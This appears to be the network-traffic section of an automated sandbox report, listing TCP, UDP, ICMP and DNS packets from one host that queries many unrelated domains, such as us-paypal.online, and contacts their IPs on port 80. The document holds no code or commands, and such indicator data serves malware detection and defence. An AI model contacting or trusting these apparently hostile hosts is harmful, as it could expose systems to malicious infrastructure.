Feb 9, 2022 13:06:40.136468887 CET	49800	80	192.168.2.3	74.208.236.190
Feb 9, 2022 13:06:40.136617899 CET	49800	80	192.168.2.3	74.208.236.190
Feb 9, 2022 13:06:40.279892921 CET	80	49800	74.208.236.190	192.168.2.3
Feb 9, 2022 13:06:40.286726952 CET	80	49800	74.208.236.190	192.168.2.3
Feb 9, 2022 13:06:40.286765099 CET	80	49800	74.208.236.190	192.168.2.3
Feb 9, 2022 13:06:40.286912918 CET	49800	80	192.168.2.3	74.208.236.190
Feb 9, 2022 13:06:40.287015915 CET	49800	80	192.168.2.3	74.208.236.190
Feb 9, 2022 13:06:40.430356979 CET	80	49800	74.208.236.190	192.168.2.3
Feb 9, 2022 13:06:56.742398024 CET	49823	80	192.168.2.3	101.35.123.80
Feb 9, 2022 13:06:56.987169981 CET	80	49823	101.35.123.80	192.168.2.3
Feb 9, 2022 13:06:56.987477064 CET	49823	80	192.168.2.3	101.35.123.80
Feb 9, 2022 13:06:56.987637043 CET	49823	80	192.168.2.3	101.35.123.80
Feb 9, 2022 13:06:57.232350111 CET	80	49823	101.35.123.80	192.168.2.3
Feb 9, 2022 13:06:57.232505083 CET	80	49823	101.35.123.80	192.168.2.3
Feb 9, 2022 13:06:57.232628107 CET	49823	80	192.168.2.3	101.35.123.80
Feb 9, 2022 13:06:57.232691050 CET	80	49823	101.35.123.80	192.168.2.3
Feb 9, 2022 13:06:57.232961893 CET	49823	80	192.168.2.3	101.35.123.80
Feb 9, 2022 13:06:57.233120918 CET	49823	80	192.168.2.3	101.35.123.80
Feb 9, 2022 13:06:57.477617025 CET	80	49823	101.35.123.80	192.168.2.3
Feb 9, 2022 13:07:22.761643887 CET	49825	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:07:22.865806103 CET	80	49825	66.96.160.139	192.168.2.3
Feb 9, 2022 13:07:22.866003990 CET	49825	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:07:22.866305113 CET	49825	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:07:22.970237017 CET	80	49825	66.96.160.139	192.168.2.3
Feb 9, 2022 13:07:23.010622025 CET	80	49825	66.96.160.139	192.168.2.3
Feb 9, 2022 13:07:23.010647058 CET	80	49825	66.96.160.139	192.168.2.3
Feb 9, 2022 13:07:23.010896921 CET	49825	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:07:23.010942936 CET	49825	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:07:23.115843058 CET	80	49825	66.96.160.139	192.168.2.3
Feb 9, 2022 13:07:28.057640076 CET	49826	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:07:28.073940039 CET	80	49826	104.21.36.34	192.168.2.3
Feb 9, 2022 13:07:28.074040890 CET	49826	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:07:28.074331999 CET	49826	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:07:28.090425968 CET	80	49826	104.21.36.34	192.168.2.3
Feb 9, 2022 13:07:28.125343084 CET	80	49826	104.21.36.34	192.168.2.3
Feb 9, 2022 13:07:28.125361919 CET	80	49826	104.21.36.34	192.168.2.3
Feb 9, 2022 13:07:28.125541925 CET	49826	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:07:28.125650883 CET	49826	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:07:28.141798973 CET	80	49826	104.21.36.34	192.168.2.3
Feb 9, 2022 13:07:43.292608023 CET	49828	80	192.168.2.3	18.194.171.90
Feb 9, 2022 13:07:43.311074972 CET	80	49828	18.194.171.90	192.168.2.3
Feb 9, 2022 13:07:43.313735008 CET	49828	80	192.168.2.3	18.194.171.90
Feb 9, 2022 13:07:43.313919067 CET	49828	80	192.168.2.3	18.194.171.90
Feb 9, 2022 13:07:43.332204103 CET	80	49828	18.194.171.90	192.168.2.3
Feb 9, 2022 13:07:43.332231998 CET	80	49828	18.194.171.90	192.168.2.3
Feb 9, 2022 13:07:43.332243919 CET	80	49828	18.194.171.90	192.168.2.3
Feb 9, 2022 13:07:43.332365990 CET	49828	80	192.168.2.3	18.194.171.90
Feb 9, 2022 13:07:43.332474947 CET	49828	80	192.168.2.3	18.194.171.90
Feb 9, 2022 13:07:43.350724936 CET	80	49828	18.194.171.90	192.168.2.3
Feb 9, 2022 13:07:49.071295977 CET	49829	80	192.168.2.3	52.20.84.62
Feb 9, 2022 13:07:49.209686041 CET	80	49829	52.20.84.62	192.168.2.3
Feb 9, 2022 13:07:49.209870100 CET	49829	80	192.168.2.3	52.20.84.62
Feb 9, 2022 13:07:49.210068941 CET	49829	80	192.168.2.3	52.20.84.62
Feb 9, 2022 13:07:49.347536087 CET	80	49829	52.20.84.62	192.168.2.3
Feb 9, 2022 13:07:49.347565889 CET	80	49829	52.20.84.62	192.168.2.3
Feb 9, 2022 13:07:49.347605944 CET	80	49829	52.20.84.62	192.168.2.3
Feb 9, 2022 13:07:49.347784996 CET	49829	80	192.168.2.3	52.20.84.62
Feb 9, 2022 13:07:49.347825050 CET	49829	80	192.168.2.3	52.20.84.62
Feb 9, 2022 13:07:49.487782955 CET	80	49829	52.20.84.62	192.168.2.3
Feb 9, 2022 13:08:03.210566998 CET	49830	80	192.168.2.3	106.186.69.5
Feb 9, 2022 13:08:03.508167982 CET	80	49830	106.186.69.5	192.168.2.3
Feb 9, 2022 13:08:03.508353949 CET	49830	80	192.168.2.3	106.186.69.5
Feb 9, 2022 13:08:03.508497953 CET	49830	80	192.168.2.3	106.186.69.5
Feb 9, 2022 13:08:03.825314045 CET	80	49830	106.186.69.5	192.168.2.3
Feb 9, 2022 13:08:03.825376034 CET	80	49830	106.186.69.5	192.168.2.3
Feb 9, 2022 13:08:03.825686932 CET	49830	80	192.168.2.3	106.186.69.5
Feb 9, 2022 13:08:03.825761080 CET	49830	80	192.168.2.3	106.186.69.5
Feb 9, 2022 13:08:04.125775099 CET	80	49830	106.186.69.5	192.168.2.3
Feb 9, 2022 13:08:13.954530954 CET	49831	80	192.168.2.3	213.186.33.5
Feb 9, 2022 13:08:13.981623888 CET	80	49831	213.186.33.5	192.168.2.3
Feb 9, 2022 13:08:13.981822968 CET	49831	80	192.168.2.3	213.186.33.5
Feb 9, 2022 13:08:13.982130051 CET	49831	80	192.168.2.3	213.186.33.5
Feb 9, 2022 13:08:14.018404007 CET	80	49831	213.186.33.5	192.168.2.3
Feb 9, 2022 13:08:14.018459082 CET	80	49831	213.186.33.5	192.168.2.3
Feb 9, 2022 13:08:14.018682957 CET	49831	80	192.168.2.3	213.186.33.5
Feb 9, 2022 13:08:14.018757105 CET	49831	80	192.168.2.3	213.186.33.5
Feb 9, 2022 13:08:14.045794010 CET	80	49831	213.186.33.5	192.168.2.3
Feb 9, 2022 13:08:19.075201988 CET	49832	80	192.168.2.3	34.102.136.180
Feb 9, 2022 13:08:19.091528893 CET	80	49832	34.102.136.180	192.168.2.3
Feb 9, 2022 13:08:19.091653109 CET	49832	80	192.168.2.3	34.102.136.180
Feb 9, 2022 13:08:19.091783047 CET	49832	80	192.168.2.3	34.102.136.180
Feb 9, 2022 13:08:19.108007908 CET	80	49832	34.102.136.180	192.168.2.3
Feb 9, 2022 13:08:19.207209110 CET	80	49832	34.102.136.180	192.168.2.3
Feb 9, 2022 13:08:19.207233906 CET	80	49832	34.102.136.180	192.168.2.3
Feb 9, 2022 13:08:19.207346916 CET	49832	80	192.168.2.3	34.102.136.180
Feb 9, 2022 13:08:19.207423925 CET	49832	80	192.168.2.3	34.102.136.180
Feb 9, 2022 13:08:19.514151096 CET	49832	80	192.168.2.3	34.102.136.180
Feb 9, 2022 13:08:19.530498028 CET	80	49832	34.102.136.180	192.168.2.3
Feb 9, 2022 13:08:24.246422052 CET	49833	80	192.168.2.3	217.160.0.132
Feb 9, 2022 13:08:24.265253067 CET	80	49833	217.160.0.132	192.168.2.3
Feb 9, 2022 13:08:24.265429020 CET	49833	80	192.168.2.3	217.160.0.132
Feb 9, 2022 13:08:24.265538931 CET	49833	80	192.168.2.3	217.160.0.132
Feb 9, 2022 13:08:24.284243107 CET	80	49833	217.160.0.132	192.168.2.3
Feb 9, 2022 13:08:24.293019056 CET	80	49833	217.160.0.132	192.168.2.3
Feb 9, 2022 13:08:24.293050051 CET	80	49833	217.160.0.132	192.168.2.3
Feb 9, 2022 13:08:24.293183088 CET	49833	80	192.168.2.3	217.160.0.132
Feb 9, 2022 13:08:24.293409109 CET	49833	80	192.168.2.3	217.160.0.132
Feb 9, 2022 13:08:24.312031984 CET	80	49833	217.160.0.132	192.168.2.3
Feb 9, 2022 13:08:34.416929960 CET	49834	80	192.168.2.3	162.0.233.84
Feb 9, 2022 13:08:34.576195955 CET	80	49834	162.0.233.84	192.168.2.3
Feb 9, 2022 13:08:34.576380014 CET	49834	80	192.168.2.3	162.0.233.84
Feb 9, 2022 13:08:34.576699018 CET	49834	80	192.168.2.3	162.0.233.84
Feb 9, 2022 13:08:34.735513926 CET	80	49834	162.0.233.84	192.168.2.3
Feb 9, 2022 13:08:34.861932039 CET	80	49834	162.0.233.84	192.168.2.3
Feb 9, 2022 13:08:34.861970901 CET	80	49834	162.0.233.84	192.168.2.3
Feb 9, 2022 13:08:34.862102985 CET	49834	80	192.168.2.3	162.0.233.84
Feb 9, 2022 13:08:36.578783989 CET	49834	80	192.168.2.3	162.0.233.84
Feb 9, 2022 13:08:36.738001108 CET	80	49834	162.0.233.84	192.168.2.3
Feb 9, 2022 13:08:53.933887959 CET	49835	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:53.957452059 CET	80	49835	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:53.957575083 CET	49835	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:53.957725048 CET	49835	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:53.957743883 CET	49835	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:53.958197117 CET	49836	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:53.980479956 CET	80	49835	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:53.981517076 CET	80	49836	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:53.981628895 CET	49836	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:53.990935087 CET	49836	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:53.991300106 CET	49837	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:54.013865948 CET	80	49836	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.014018059 CET	49836	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:54.014646053 CET	80	49836	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.014724016 CET	49836	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:54.017380953 CET	80	49837	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.017504930 CET	49837	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:54.019678116 CET	49837	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:54.020278931 CET	80	49835	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.020303965 CET	80	49835	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.020374060 CET	49835	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:54.020409107 CET	49835	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:54.036799908 CET	80	49836	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.037733078 CET	80	49836	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.045610905 CET	80	49837	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.054341078 CET	80	49836	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.085577965 CET	80	49837	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.085608959 CET	80	49837	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.085808039 CET	49837	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:54.085954905 CET	49837	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:54.178752899 CET	80	49836	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.178781033 CET	80	49836	185.215.4.12	192.168.2.3
Feb 9, 2022 13:08:54.178891897 CET	49836	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:54.178920031 CET	49836	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:54.391928911 CET	49837	80	192.168.2.3	185.215.4.12
Feb 9, 2022 13:08:54.417579889 CET	80	49837	185.215.4.12	192.168.2.3
Feb 9, 2022 13:09:09.769141912 CET	49838	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:09.871653080 CET	80	49838	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:09.871750116 CET	49838	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:09.871992111 CET	49838	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:09.872133970 CET	49838	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:09.872884989 CET	49839	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:09.974724054 CET	80	49838	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:09.975370884 CET	80	49839	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:09.975506067 CET	49839	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:09.977155924 CET	49839	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:09.977920055 CET	49840	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:09.992103100 CET	80	49838	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:09.992126942 CET	80	49838	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:09.992204905 CET	49838	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:09.992242098 CET	49838	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:10.079534054 CET	80	49839	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.079557896 CET	80	49839	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.079565048 CET	80	49839	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.079674959 CET	80	49839	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.079705954 CET	49839	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:10.079797983 CET	49839	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:10.081679106 CET	80	49840	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.081795931 CET	49840	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:10.081944942 CET	49840	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:10.182203054 CET	80	49839	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.182221889 CET	80	49839	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.182229042 CET	80	49839	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.185678959 CET	80	49840	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.195720911 CET	80	49839	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.195739031 CET	80	49839	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.195785046 CET	49839	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:10.195821047 CET	49839	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:10.211285114 CET	80	49840	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.211303949 CET	80	49840	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:10.211407900 CET	49840	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:10.211440086 CET	49840	80	192.168.2.3	66.96.160.139
Feb 9, 2022 13:09:10.316620111 CET	80	49840	66.96.160.139	192.168.2.3
Feb 9, 2022 13:09:15.222316980 CET	49842	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.238711119 CET	80	49842	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.238893986 CET	49842	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.239033937 CET	49842	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.239078045 CET	49842	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.239404917 CET	49843	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.255212069 CET	80	49842	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.255552053 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.255702019 CET	49843	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.255948067 CET	80	49842	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.256036043 CET	49842	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.257500887 CET	49843	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.257687092 CET	49844	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.273957014 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.273976088 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.273983955 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.273994923 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.274007082 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.274097919 CET	49843	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.274116039 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.274131060 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.274138927 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.274152994 CET	49843	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.274156094 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.274194002 CET	49843	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.274240017 CET	49843	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.274292946 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.274308920 CET	80	49844	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.274401903 CET	49844	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.274487972 CET	49844	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.290232897 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290250063 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290257931 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290266037 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290316105 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290328026 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290366888 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290429115 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290441036 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290447950 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290458918 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290467024 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290510893 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290604115 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290636063 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290647030 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290657043 CET	80	49844	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.290812016 CET	80	49843	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.311494112 CET	80	49844	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.311709881 CET	80	49844	104.21.36.34	192.168.2.3
Feb 9, 2022 13:09:15.311822891 CET	49844	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.311928988 CET	49844	80	192.168.2.3	104.21.36.34
Feb 9, 2022 13:09:15.327981949 CET	80	49844	104.21.36.34	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 9, 2022 13:06:28.597506046 CET	52650	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:06:28.639404058 CET	53	52650	8.8.8.8	192.168.2.3
Feb 9, 2022 13:06:33.666980028 CET	58361	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:06:33.991206884 CET	53	58361	8.8.8.8	192.168.2.3
Feb 9, 2022 13:06:39.964096069 CET	53615	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:06:39.989192963 CET	53	53615	8.8.8.8	192.168.2.3
Feb 9, 2022 13:06:45.315433979 CET	50728	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:06:45.657224894 CET	53	50728	8.8.8.8	192.168.2.3
Feb 9, 2022 13:06:50.668472052 CET	53777	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:06:50.689320087 CET	53	53777	8.8.8.8	192.168.2.3
Feb 9, 2022 13:06:55.716470003 CET	57106	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:06:56.726355076 CET	57106	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:06:56.740200996 CET	53	57106	8.8.8.8	192.168.2.3
Feb 9, 2022 13:06:56.742850065 CET	53	57106	8.8.8.8	192.168.2.3
Feb 9, 2022 13:07:07.288367033 CET	56773	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:07:07.314388990 CET	53	56773	8.8.8.8	192.168.2.3
Feb 9, 2022 13:07:12.325500965 CET	60982	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:07:12.343287945 CET	53	60982	8.8.8.8	192.168.2.3
Feb 9, 2022 13:07:17.357990026 CET	58058	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:07:17.614554882 CET	53	58058	8.8.8.8	192.168.2.3
Feb 9, 2022 13:07:22.653285980 CET	64367	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:07:22.760621071 CET	53	64367	8.8.8.8	192.168.2.3
Feb 9, 2022 13:07:28.030323029 CET	51539	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:07:28.055629015 CET	53	51539	8.8.8.8	192.168.2.3
Feb 9, 2022 13:07:33.140662909 CET	55393	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:07:33.161246061 CET	53	55393	8.8.8.8	192.168.2.3
Feb 9, 2022 13:07:38.225905895 CET	50585	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:07:38.244827986 CET	53	50585	8.8.8.8	192.168.2.3
Feb 9, 2022 13:07:43.267290115 CET	58540	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:07:43.290422916 CET	53	58540	8.8.8.8	192.168.2.3
Feb 9, 2022 13:07:48.944176912 CET	55108	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:07:49.069250107 CET	53	55108	8.8.8.8	192.168.2.3
Feb 9, 2022 13:08:02.952388048 CET	58942	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:08:03.208623886 CET	53	58942	8.8.8.8	192.168.2.3
Feb 9, 2022 13:08:08.846414089 CET	64432	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:08:08.865133047 CET	53	64432	8.8.8.8	192.168.2.3
Feb 9, 2022 13:08:13.876502991 CET	49250	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:08:13.952061892 CET	53	49250	8.8.8.8	192.168.2.3
Feb 9, 2022 13:08:19.051481962 CET	63490	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:08:19.074094057 CET	53	63490	8.8.8.8	192.168.2.3
Feb 9, 2022 13:08:24.221360922 CET	65110	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:08:24.245446920 CET	53	65110	8.8.8.8	192.168.2.3
Feb 9, 2022 13:08:29.300555944 CET	61120	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:08:29.344249010 CET	53	61120	8.8.8.8	192.168.2.3
Feb 9, 2022 13:08:34.392163038 CET	53079	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:08:34.415016890 CET	53	53079	8.8.8.8	192.168.2.3
Feb 9, 2022 13:08:53.839023113 CET	50824	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:08:53.918651104 CET	53	50824	8.8.8.8	192.168.2.3
Feb 9, 2022 13:08:59.107790947 CET	56706	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:08:59.128581047 CET	53	56706	8.8.8.8	192.168.2.3
Feb 9, 2022 13:08:59.134149075 CET	53569	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:08:59.155647039 CET	53	53569	8.8.8.8	192.168.2.3
Feb 9, 2022 13:08:59.161711931 CET	62855	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:08:59.180470943 CET	53	62855	8.8.8.8	192.168.2.3
Feb 9, 2022 13:09:04.200251102 CET	51046	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:09:04.460299015 CET	53	51046	8.8.8.8	192.168.2.3
Feb 9, 2022 13:09:04.463673115 CET	65501	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:09:04.718585968 CET	53	65501	8.8.8.8	192.168.2.3
Feb 9, 2022 13:09:04.735899925 CET	53465	53	192.168.2.3	8.8.8.8
Feb 9, 2022 13:09:04.754617929 CET	53	53465	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 9, 2022 13:06:56.743891954 CET	192.168.2.3	8.8.8.8	d000	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 9, 2022 13:06:28.597506046 CET	192.168.2.3	8.8.8.8	0x4a8f	Standard query (0)	www.strickercosolutions.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:06:33.666980028 CET	192.168.2.3	8.8.8.8	0x1e78	Standard query (0)	www.fhpuyfpe.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:06:39.964096069 CET	192.168.2.3	8.8.8.8	0xb0c0	Standard query (0)	www.unitedtrials.net	A (IP address)	IN (0x0001)
Feb 9, 2022 13:06:45.315433979 CET	192.168.2.3	8.8.8.8	0xaed1	Standard query (0)	www.tutorgpa.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:06:50.668472052 CET	192.168.2.3	8.8.8.8	0xb61f	Standard query (0)	www.real-market-34.xyz	A (IP address)	IN (0x0001)
Feb 9, 2022 13:06:55.716470003 CET	192.168.2.3	8.8.8.8	0x7cf9	Standard query (0)	www.oooci.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:06:56.726355076 CET	192.168.2.3	8.8.8.8	0x7cf9	Standard query (0)	www.oooci.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:07.288367033 CET	192.168.2.3	8.8.8.8	0xf5ac	Standard query (0)	www.punksparrow.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:12.325500965 CET	192.168.2.3	8.8.8.8	0xfd21	Standard query (0)	www.drinco.club	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:17.357990026 CET	192.168.2.3	8.8.8.8	0xc5a9	Standard query (0)	www.libertymarket.net	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:22.653285980 CET	192.168.2.3	8.8.8.8	0x3439	Standard query (0)	www.perfectselfstorageaston.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:28.030323029 CET	192.168.2.3	8.8.8.8	0xe3d9	Standard query (0)	www.computershit.net	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:33.140662909 CET	192.168.2.3	8.8.8.8	0x1038	Standard query (0)	www.us-paypal.online	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:38.225905895 CET	192.168.2.3	8.8.8.8	0x62f3	Standard query (0)	www.boninvahas.club	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:43.267290115 CET	192.168.2.3	8.8.8.8	0xe748	Standard query (0)	www.getbraintruth.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:48.944176912 CET	192.168.2.3	8.8.8.8	0x7763	Standard query (0)	www.cosmosmeta.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:02.952388048 CET	192.168.2.3	8.8.8.8	0xf5e3	Standard query (0)	www.yokoi-tatami-lab.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:08.846414089 CET	192.168.2.3	8.8.8.8	0x54eb	Standard query (0)	www.wxiw.xyz	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:13.876502991 CET	192.168.2.3	8.8.8.8	0xd32b	Standard query (0)	www.okargo.pro	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:19.051481962 CET	192.168.2.3	8.8.8.8	0xc1e5	Standard query (0)	www.gestaltants.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:24.221360922 CET	192.168.2.3	8.8.8.8	0x9080	Standard query (0)	www.marketplaceimmo.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:29.300555944 CET	192.168.2.3	8.8.8.8	0x40a3	Standard query (0)	www.marsmoose.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:34.392163038 CET	192.168.2.3	8.8.8.8	0x63d3	Standard query (0)	www.fraiuhs.com	A (IP address)	IN (0x0001)
